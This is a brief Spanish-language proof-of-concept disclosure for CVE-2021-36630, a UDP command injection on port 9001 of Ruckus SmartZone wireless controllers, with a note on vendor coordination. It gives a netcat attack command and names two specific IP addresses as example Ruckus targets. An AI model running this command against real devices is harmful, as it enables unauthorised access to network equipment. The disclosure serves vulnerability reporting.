
Prueba de concepto de exploit para CVE-2021-36630 dirigido a controladores inalámbricos Ruckus SmartZone mediante inyección de comandos UDP en el puerto 9001.
Los dispositivos de la serie SmartZone de Ruckus presentan riesgos de seguridad. Tras notificar al fabricante, este organizó activamente personal técnico para realizar investigaciones. Durante este período, también proporcionamos sugerencias de seguridad y métodos de verificación en numerosas ocasiones. El 19 de julio, la empresa emitió oficialmente un aviso de seguridad.
Comando de ataque: echo "" | nc -4u ip:address 9001
ejemplo de dirección IP: 62.210.8.110?111.107.251.71(RuckusWireless SZ ip)

SmartZone-100 - todas todas - Virtual SmartZone
http://ruckus.com http://smartzone-100.com https://anquan.baidu.com/article/1434